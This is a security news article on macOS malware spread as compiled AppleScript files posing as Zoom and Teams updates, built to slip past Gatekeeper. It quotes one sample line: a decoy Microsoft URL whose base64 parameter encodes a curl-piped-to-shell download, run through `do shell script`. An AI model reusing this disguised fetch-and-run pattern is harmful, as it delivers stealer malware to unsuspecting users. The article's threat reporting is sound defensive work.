Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.
Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, attackers have identified and weaponized a new delivery mechanism using compiled AppleScript files with deceptive naming conventions.
These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.
The emerging threat centers on .scpt files that open directly in Script Editor.app by default, creating an attractive attack surface for threat actors.
When users double-click these files, the application displays a user-friendly interface with social engineering prompts encouraging execution.
The malware operators strategically embed malicious code after extensive blank lines to hide the actual payload from casual inspection.
By simply clicking the “Run” button or pressing Cmd+R, users inadvertently execute the script even if it has been flagged by Gatekeeper quarantine protections, effectively circumventing Apple’s security mechanisms.
.webp "Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates 3")
Security analysts at Moonlock Labs and Pepe Berba identified this technique gaining prominence in recent months, discovering sophisticated campaigns that previously appeared in advanced persistent threat operations.
Pepe Berba noted that while AppleScript files themselves are not new, the proliferation of samples using this technique represents a concerning trend, particularly as commodity malware families like MacSync Stealer and Odyssey Stealer have adopted the methodology.
This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.
Technical structure
The technical structure of these scripts employs several clever deception tactics.
A sample analyzed reveals AppleScript code such as set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" followed by do shell script "open -g " & quoted form of teamsSDKURL.
.webp "Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates 4")
This command structure opens malicious URLs in the background while presenting legitimate-looking update prompts to the user.
The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”
The persistence and detection evasion capabilities of these attacks deserve particular attention.
Many .scpt files currently maintain zero detections on VirusTotal, providing attackers with significant operational runway before security vendors implement detection signatures.
The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.
This attack vector presents a significant challenge for macOS security, as it exploits user trust in familiar application names while leveraging native system tools that legitimate users regularly interact with.
Organizations must educate users about verifying software updates through official channels and implement endpoint detection solutions capable of monitoring AppleScript execution patterns.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
